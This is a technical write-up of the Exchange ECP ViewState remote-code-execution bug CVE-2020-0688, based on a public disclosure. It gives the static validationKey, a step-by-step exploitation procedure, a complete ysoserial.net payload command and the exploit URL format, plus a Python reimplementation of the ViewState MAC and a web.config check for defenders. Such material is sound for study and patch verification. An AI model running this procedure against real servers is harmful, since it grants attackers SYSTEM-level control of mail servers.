RCE in Microsoft Exchange Web Interface (CVE-2020-0688)

Notes based on the Zero Day Initiative blog post that disclosed the bug.

Like any ASP.NET application, the Exchange Control Panel (ECP) relies on a validationKey and a decryptionKey, declared in the machineKey element of its web.config, to protect the ViewState. On an unpatched Microsoft Exchange Server these keys are not generated at install time: every installation ships with the same static values, so the validationKey always has the value CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF (with SHA1 as the validation algorithm). To check a server, look at the machineKey element in the ECP application's web.config: if it still carries that validationKey, the host is unpatched.

Because the validationKey is known, an attacker can craft a malicious ViewState carrying a valid MAC, and the server will accept it. The ViewState is a serialized .NET object graph that the server deserializes once the MAC check passes, so a deserialization gadget chain embedded in it yields command execution in the context of the ECP application pool, which runs as SYSTEM.

To exploit the vulnerability we need a valid authenticated session to ECP, from which we collect the ViewStateUserKey (ECP uses the value of the ASP.NET_SessionId cookie) and the __VIEWSTATEGENERATOR value. The generator is derived from the page path, so for /ecp/default.aspx it is typically B97B4E27. The MAC is bound to the session through the ViewStateUserKey, so the final request has to be sent with that same session's cookies.

First, log in and visit /ecp/default.aspx to collect the two values. Then use ysoserial.net to generate the signed payload (the TextFormattingRunProperties gadget, signed with the static key, in legacy MAC mode):

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "<cmd>" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="<generator>" --viewstateuserkey="<ASP.NET_SessionId>" --islegacy

Finally, send the payload to the same page with the session cookies; ECP accepts the ViewState in the query string, so a GET request is enough:

https://<host>/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<serialized_payload>

# For example (don't forget to URL-encode the payload, since the base64 contains '/', '+' and '='):
https://<host>/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2fwEyvgYAAQAAAP%2f%2f%2f%...
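To see why a static validationKey is fatal, here is an added example (not code from the ZDI post or from this page) that reimplements the legacy ASP.NET ViewState MAC, the mode that ysoserial's --islegacy flag targets: HMAC-SHA1 keyed with the validationKey over the ViewState bytes followed by a modifier made of the __VIEWSTATEGENERATOR value and the ViewStateUserKey. With the key, the generator and the session id in hand, anyone can sign arbitrary ViewState bytes and the server's check passes; with a per-installation random key (what a patched server has) the same blob is rejected. It also includes the defender-side web.config check from the text. The session id, the ViewState body, the web.config fragment, the "patched" key and the host name are constructed placeholders, not values observed on a real server.

```python
"""Added example, not code from the ZDI post or this page.

Reimplements the legacy ASP.NET ViewState MAC (what ysoserial --islegacy
produces) so the effect of a known validationKey can be shown offline.
The session id, ViewState body, web.config snippet and "patched" key are
constructed placeholders.
"""
import base64
import hashlib
import hmac
import struct
import xml.etree.ElementTree as ET
from urllib.parse import quote

# Static validationKey every unpatched Exchange ECP ships with (from the page).
EXCHANGE_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
# Assumed: a per-installation random key, i.e. what a patched server uses.
PATCHED_RANDOM_KEY = "9F0C3E7A2B5D4C1E8A6F0B3D5C7E9A1B2C4D6E8F0A1B2C3D"

GENERATOR = "B97B4E27"                               # __VIEWSTATEGENERATOR of /ecp/default.aspx
SESSION_ID = "3d1a6c2e-5b4f-4a8e-9c7d-0f1e2a3b4c5d"  # constructed ASP.NET_SessionId value
MAC_LEN = hashlib.sha1().digest_size                 # validation="SHA1" -> 20-byte HMAC-SHA1

# Constructed body. 0xFF 0x01 is the ObjectStateFormatter header, which is
# why a ViewState base64 string starts with "/wE"; a real exploit carries
# the ysoserial gadget chain here instead of this placeholder text.
SAMPLE_BODY = b"\xff\x01\x32" + b"placeholder-not-a-gadget-chain"

# Constructed web.config fragment carrying the static key, for the defender check.
VULNERABLE_WEB_CONFIG = f"""<configuration><system.web>
  <machineKey validationKey="{EXCHANGE_VALIDATION_KEY}" validation="SHA1" />
</system.web></configuration>"""


def mac_key_modifier(generator_hex: str, viewstate_user_key: str) -> bytes:
    """ObjectStateFormatter.GetMacKeyModifier(): the page identifier (the
    __VIEWSTATEGENERATOR value) as a 4-byte little-endian int, followed by
    the ViewStateUserKey encoded as UTF-16LE."""
    return struct.pack("<I", int(generator_hex, 16)) + viewstate_user_key.encode("utf-16-le")


def legacy_viewstate_mac(validation_key_hex: str, body: bytes,
                         generator_hex: str, viewstate_user_key: str) -> bytes:
    """Legacy MachineKeySection MAC: HMAC-SHA1(validationKey, body || modifier)."""
    key = bytes.fromhex(validation_key_hex)
    msg = body + mac_key_modifier(generator_hex, viewstate_user_key)
    return hmac.new(key, msg, hashlib.sha1).digest()


def sign_viewstate(validation_key_hex: str, body: bytes,
                   generator_hex: str, viewstate_user_key: str) -> str:
    """What the attacker (or ysoserial) does: append the MAC and base64-encode."""
    mac = legacy_viewstate_mac(validation_key_hex, body, generator_hex, viewstate_user_key)
    return base64.b64encode(body + mac).decode("ascii")


def verify_viewstate(validation_key_hex: str, encoded: str,
                     generator_hex: str, viewstate_user_key: str) -> bool:
    """What the server does before deserializing: recompute and compare the MAC."""
    try:
        raw = base64.b64decode(encoded, validate=True)
    except ValueError:
        return False
    if len(raw) <= MAC_LEN:
        return False
    body, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = legacy_viewstate_mac(validation_key_hex, body, generator_hex, viewstate_user_key)
    return hmac.compare_digest(mac, expected)


def build_ecp_url(host: str, generator_hex: str, encoded_viewstate: str) -> str:
    """Build the GET request from the page; '/', '+' and '=' in the base64
    must be percent-encoded or the server decodes a different blob."""
    return (f"https://{host}/ecp/default.aspx?__VIEWSTATEGENERATOR={generator_hex}"
            f"&__VIEWSTATE={quote(encoded_viewstate, safe='')}")


def uses_static_key(web_config_xml: str) -> bool:
    """Defender check: does the machineKey element in this web.config text
    still carry the well-known Exchange validationKey?"""
    root = ET.fromstring(web_config_xml)
    return any(elem.get("validationKey", "").upper() == EXCHANGE_VALIDATION_KEY
               for elem in root.iter("machineKey"))


if __name__ == "__main__":
    forged = sign_viewstate(EXCHANGE_VALIDATION_KEY, SAMPLE_BODY, GENERATOR, SESSION_ID)
    print("unpatched server accepts forged ViewState:",
          verify_viewstate(EXCHANGE_VALIDATION_KEY, forged, GENERATOR, SESSION_ID))
    print("patched (random key) server accepts it:   ",
          verify_viewstate(PATCHED_RANDOM_KEY, forged, GENERATOR, SESSION_ID))
    print("web.config still has the static key:      ", uses_static_key(VULNERABLE_WEB_CONFIG))
    print(build_ecp_url("mail.example.com", GENERATOR, forged))
```

Two things worth noting. The MAC is bound to the generator and the ViewStateUserKey, which is why the page's procedure insists on collecting both from a live session: a blob signed for one session id fails for another. And this reproduces only the legacy MAC scheme that the --islegacy flag selects; the .NET 4.5+ scheme derives a per-purpose key instead, so without that flag ysoserial produces a different (and here unverifiable) encoding.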